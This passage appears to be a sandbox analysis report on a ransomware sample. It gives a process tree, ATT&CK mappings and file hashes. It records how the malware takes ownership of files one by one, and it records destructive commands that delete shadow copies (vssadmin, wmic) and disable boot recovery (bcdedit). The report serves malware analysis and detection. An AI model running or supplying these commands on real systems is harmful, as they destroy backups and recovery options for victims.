      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"
      - Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe (PID 2284)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "usa03.ths" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3896)
        sOCkujKF.exe -accepteula "usa03.ths" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3636)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 2928)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 108)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 1404)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"
      - Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe (PID 2948)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "GREEK.TXT" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3716)
        sOCkujKF.exe -accepteula "GREEK.TXT" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2820)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 1132)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 1176)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 3844)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"
      - Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe (PID 3672)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CP1253.TXT" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1020)
        sOCkujKF.exe -accepteula "CP1253.TXT" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3800)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 3496)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 220)
      cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 3936)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
      - Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe (PID 1716)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "behavior.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1732)
        sOCkujKF.exe -accepteula "behavior.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 788)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 1276)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 3884)
      cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 3840)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"
      - Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe (PID 2428)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3956)
        sOCkujKF.exe -accepteula "resource.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4092)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 1308)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 3472)
      cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 4088)
      takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 2656)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "qmgr1.dat" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3608)
        sOCkujKF.exe -accepteula "qmgr1.dat" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3948)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:3512
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:3384
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵PID:2356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "behavior.xml" -nobanner3⤵PID:2192
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "behavior.xml" -nobanner4⤵PID:3452
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:3256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Modifies file permissions
PID:2256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:3928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:2676
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3120
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:3228
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:440
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"3⤵
- Modifies file permissions
PID:332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:1068
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:2800
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2984
-
-
-
  - C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
    PID: 2316
    - C:\Windows\SysWOW64\cacls.exe
      cmdline: cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
      PID: 3084
    - C:\Windows\SysWOW64\takeown.exe
      cmdline: takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
      tags: Modifies file permissions
      PID: 1592
    - C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "background.png" -nobanner
      PID: 3312
      - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
        cmdline: sOCkujKF.exe -accepteula "background.png" -nobanner
        PID: 2740
    - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      cmdline: sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
      PID: 2380
  - C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""
    PID: 4116
    - C:\Windows\SysWOW64\cacls.exe
      cmdline: cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C
      PID: 840
    - C:\Windows\SysWOW64\takeown.exe
      cmdline: takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"
      tags: Modifies file permissions
      PID: 812
    - C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "tasks.xml" -nobanner
      PID: 2668
      - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
        cmdline: sOCkujKF.exe -accepteula "tasks.xml" -nobanner
        PID: 1156
    - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      cmdline: sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
      PID: 4132
  - C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""
    PID: 844
    - C:\Windows\SysWOW64\cacls.exe
      cmdline: cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C
      PID: 2888
    - C:\Windows\SysWOW64\takeown.exe
      cmdline: takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"
      PID: 2160
    - C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "qmgr0.dat" -nobanner
      PID: 3924
      - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
        cmdline: sOCkujKF.exe -accepteula "qmgr0.dat" -nobanner
        PID: 1964
    - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      cmdline: sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
      PID: 2664
  - C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
    PID: 668
    - C:\Windows\SysWOW64\cacls.exe
      cmdline: cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
      PID: 3024
    - C:\Windows\SysWOW64\takeown.exe
      cmdline: takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
      tags: Modifies file permissions
      PID: 3572
    - C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "overlay.png" -nobanner
      PID: 3668
      - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
        cmdline: sOCkujKF.exe -accepteula "overlay.png" -nobanner
        PID: 2000
    - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      cmdline: sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
      PID: 4064
  - C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""
    PID: 3864
    - C:\Windows\SysWOW64\cacls.exe
      cmdline: cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C
      PID: 4152
    - C:\Windows\SysWOW64\takeown.exe
      cmdline: takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"
      tags: Modifies file permissions
      PID: 1688
    - C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
      PID: 1612
      - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
        cmdline: sOCkujKF.exe -accepteula "resource.xml" -nobanner
        PID: 3252
    - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      cmdline: sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
      PID: 1120
  - C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""
    PID: 3140
    - C:\Windows\SysWOW64\cacls.exe
      cmdline: cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C
      PID: 3632
    - C:\Windows\SysWOW64\takeown.exe
      cmdline: takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"
      PID: 2328
    - C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "adobepdf.xdc" -nobanner
      PID: 3000
      - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
        cmdline: sOCkujKF.exe -accepteula "adobepdf.xdc" -nobanner
        PID: 4048
    - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      cmdline: sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
      PID: 3832
  - C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""
    PID: 3400
    - C:\Windows\SysWOW64\cacls.exe
      cmdline: cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C
      PID: 3100
    - C:\Windows\SysWOW64\takeown.exe
      cmdline: takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"
      PID: 3288
    - C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "distribute_form.gif" -nobanner
      PID: 3188
      - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
        cmdline: sOCkujKF.exe -accepteula "distribute_form.gif" -nobanner
        PID: 892
    - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      cmdline: sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
      PID: 3408
  - C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""
    PID: 3616
    - C:\Windows\SysWOW64\cacls.exe
      cmdline: cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C
      PID: 3360
    - C:\Windows\SysWOW64\takeown.exe
      cmdline: takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"
      PID: 2100
    - C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "main.css" -nobanner
      PID: 3160
      - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
        cmdline: sOCkujKF.exe -accepteula "main.css" -nobanner
        PID: 3740
    - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      cmdline: sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
      PID: 1996
  - C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""
    PID: 4200
    - C:\Windows\SysWOW64\cacls.exe
      cmdline: cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C
      PID: 4212
    - C:\Windows\SysWOW64\takeown.exe
      cmdline: takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"
      PID: 3164
    - C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "review_shared.gif" -nobanner
      PID: 2584
      - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
        cmdline: sOCkujKF.exe -accepteula "review_shared.gif" -nobanner
        PID: 1268
    - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      cmdline: sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
      PID: 3260
  - C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""
    PID: 4288
    - C:\Windows\SysWOW64\cacls.exe
      cmdline: cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C
      PID: 3340
    - C:\Windows\SysWOW64\takeown.exe
      cmdline: takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"
      PID: 4076
    - C:\Windows\SysWOW64\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
      PID: 4300
      - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
        cmdline: sOCkujKF.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
        PID: 4328
- C:\Windows\system32\taskeng.exe
  cmdline: taskeng.exe {E611BE7D-FEF3-478E-965D-B30C774A9501} S-1-5-21-1603059206-2004189698-4139800220-1000:AILVMYUM\Admin:Interactive:[1]
  PID: 568
  - C:\Windows\SYSTEM32\cmd.exe
    cmdline: C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\fMynkeEd.bat"
    PID: 2972
    - C:\Windows\system32\vssadmin.exe
      cmdline: vssadmin Delete Shadows /All /Quiet
      tags: Interacts with shadow copies
      PID: 3348
    - C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic SHADOWCOPY DELETE
      tags: Suspicious use of AdjustPrivilegeToken
      PID: 2292
    - C:\Windows\system32\bcdedit.exe
      cmdline: bcdedit /set {default} recoveryenabled No
      tags: Modifies boot configuration data using bcdedit
      PID: 3296
    - C:\Windows\system32\bcdedit.exe
      cmdline: bcdedit /set {default} bootstatuspolicy ignoreallfailures
      tags: Modifies boot configuration data using bcdedit
      PID: 2348
    - C:\Windows\system32\schtasks.exe
      cmdline: SCHTASKS /Delete /TN DSHCA /F
      PID: 4152
- C:\Windows\SysWOW64\cacls.exe
  cmdline: cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
  PID: 1748
- C:\Windows\SysWOW64\takeown.exe
  cmdline: takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
  PID: 2880
- C:\Windows\system32\vssvc.exe
  cmdline: C:\Windows\system32\vssvc.exe
  tags: Suspicious use of AdjustPrivilegeToken
  PID: 764
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Defense Evasion
- File and Directory Permissions Modification (1)
- Indicator Removal (2)
  - File Deletion (2)
- Modify Registry (2)
Downloads
- Filesize: 8KB
  MD5: 2cb329dff6324938c420b375731911ff
  SHA1: 85cf6dc6157894a383a074573f36f13df1350bab
  SHA256: 0454a01a2477d8898ddfe91b1816b68de69551527aed3564cbd0ed61a234faaf
  SHA512: 83ea367f13b278d7b5061351e1dc651ebe11b12c699adef643fa2a8b91f49f4f2c999786ce57ad0b244b5a394846e940d21c4a9863a4c67033bb19083e42e2aa
- Filesize: 14B
  MD5: c74dacdd9331a6698efffe81ff66ac08
  SHA1: 79e8ce4bb5cc2436e95fad4a74a31aee7aa63043
  SHA256: 82ad297f8577dd8f868d0068e253c3d6b61a1e332d7038ed18d23da65b03ad6c
  SHA512: 24620715fb4e07f73db38962b2f95b77396d09a65f153c138f4d873e7f83f9cc72a16423ce2af745f8a04d1e657dfa7d9136ec3fd9ff5794b385ec33edae89da
- Filesize: 565B
  MD5: a7103cec20dcde9ef96b218bf30c774a
  SHA1: 51a60f922aa5877e15516c1c71924901c0a05e7a
  SHA256: 579051428f8b2c8edccd1ff265b286562665dfc318d58c0ef8ce2da128cda692
  SHA512: e887368fe998598417f5afa8a29d54327445094a8789ebd8b05b86ffd2c92f8870db97b497f2f5d99495d09f31ac0178698f860448e131002109a9a5b1ba75cd
- Filesize: 1KB
  MD5: 501ae4724b233030c3dc4f770ba54865
  SHA1: 73d88e9df2028f58038d94326289c2747926fd00
  SHA256: c08926a901c8e38861bb20e27d93c491246c292163b8c3ac328cdf8e7d3d41c8
  SHA512: 0326b9f9fd07e9767a73df9117ff2e77a4a34d97a9a88bb9507dae62d6b09ae8644d90c3f18890777966b6f7302278d1d7b0de7059df8581ca7e34e857177779
- Filesize: 2KB
  MD5: 55ed6bebab5ed8150defece70727ac2f
  SHA1: 58feedece8dc1031c7976f6820086d240d56dc90
  SHA256: 90626b22c7ea46303fd971194d58d39658811f13ebbf77423a5e656a1f8f74e3
  SHA512: a4b98c10ff55674a5dcde318d7489a91c19181980d8b50a03f49528270e1fb3e5d0b5cfefe3b3339563fea783c8bf3acb565368f4920aa6be8674bb3c1536349
- Filesize: 2KB
  MD5: 759143ae6bba3ffc9773585f5c2a93c7
  SHA1: 3c20261b40fb0fda50afff0dd9e313554ef29eee
  SHA256: 83ce5834f340ba8af97aeee4d7a38cd09f7da8b581ee30e48c35f8d67dc3a3aa
  SHA512: ba7e743a53fa71e6348a92feaf5973e29254a3a722992faee1ef10d3091311c80cdd0df2e587a144e9112306de4144f6d402f2a8ccb66d8cc6a5847953ab82f9
- Filesize: 2KB
  MD5: 939ab114345a22c84e9eddd57f01be33
  SHA1: 33e62a5b098a67d32d847cd3069f60e12e34d237
  SHA256: c5140a709db4c29e84d689ae03fadaa002da7bdcec481d0f40cf60d09c1e6248
  SHA512: b7c8787a02ae07037c636b4f2b2942967996e41bb5d641acc45224a37d1e236c2086cabdbbf3ad4029eb310e078950638a6c1281cdd70e5a177e40d7f0334d42
- Filesize: 3KB
  MD5: 1e6a6ce9afa8582f115fe72732de44c1
  SHA1: f8460eebfd1e840579a0ad4dcee5395dda1d42c9
  SHA256: bed3c3d721a5c56dd0a5f3514abcbec507ddd4bbb12ef248e3833854dbfc282c
  SHA512: 1159862f20e0cf2136c02d31d38a533b02014dd5719422dd9b91fdb3a801ca4995b9ad943679c22b813a2033350fe56ffc5269a7acecbd007ccc5cd27e55d01d
- Filesize: 24KB
  MD5: dee33529c954757369289322ac01ad10
  SHA1: 278d129cb4bd3663a7d096123a6fae4bbd328c2d
  SHA256: a1fcb24f3b4d28cf34f9d929d9e755b190aa57182ef4752a766c741f19efd063
  SHA512: 9bfb4787e3394a2f294511d337f236cb961c383a7b06d67803a2892fcdbecc69c5cbe58cffc589752175ec4b673f827f9e8ed4387a0d690b524c2d43a50aa734
- Filesize: 226B
  MD5: 8b509c42079f037beeced07732dbff55
  SHA1: dbd88c6e253b98523da97b9ece9aa5e28f87013a
  SHA256: 220112d110567da3fc62869640e8d45ea1b2d84c250dd04f6632f46ca1c0c850
  SHA512: 566587d254f3103017ccf1bc8db0fe1e0b2db313598337b01ecf83fc5e28f2e5f3094d98fc98746cf495d760f0fb3776752e3392b8dc560969f7eb608712e99a
- Filesize: 64KB
  MD5: 39384617afb7b1a4cd7b11d998292e13
  SHA1: 87689603aebba6b353bbca3d5a038c0e8e59fd4c
  SHA256: b41666aedfb669305f37349dfae96eea3f34ae7ba89629a268c2a403302bdbaa
  SHA512: 52be3914e3330330a83463cc2925ffa5d0bdb1a4358f48c1298cc0c5f631a214a8d9328232f95c496642da2300f713a5f0288d6ea6af52fb0e173c1431e442e7
- Filesize: 265B
  MD5: ddc055839f38898e4cd9133a738f1e10
  SHA1: c5781213e840f9fa2d3bb8f75aaffc37eb9d4455
  SHA256: 861f3fc0f6af2afa948352206930666a34e145f58afed65e00b92da72955afa9
  SHA512: 7c6b02853a536a606110d29a6934132986e01f4c858c1f7ae63d550e6862cd19763cf03a2218b28f5c7bf9f834c75b563ab7bb89b14b9d43e5961009d2509089
- Filesize: 260B
  MD5: a5daac56df939fb556da529481ead84a
  SHA1: 5b57309009abc7e0edef430f914ef62c3bfd7313
  SHA256: 9bdb20b60519bb326b8713d9fc9543a161b84bf782e9d31ed7cd8f57a3c12b55
  SHA512: 05f2ce16cda3f5261815237d93ecd4579ad5d19291880b6dd4e44b6d88d0286a42cff3a561f3ea93a4a09594aba8ede86d9445ee633f5113bbcaa54b44a17642
- Filesize: 1.2MB
  MD5: c82d64850d35cc6a536c11adbd261cf6
  SHA1: 9f4d070a1b4668d110b57c167c4527fa2752c1fe
  SHA256: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
  SHA512: 777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
- Filesize: 181KB
  MD5: 2f5b509929165fc13ceab9393c3b911d
  SHA1: b016316132a6a277c5d8a4d7f3d6e2c769984052
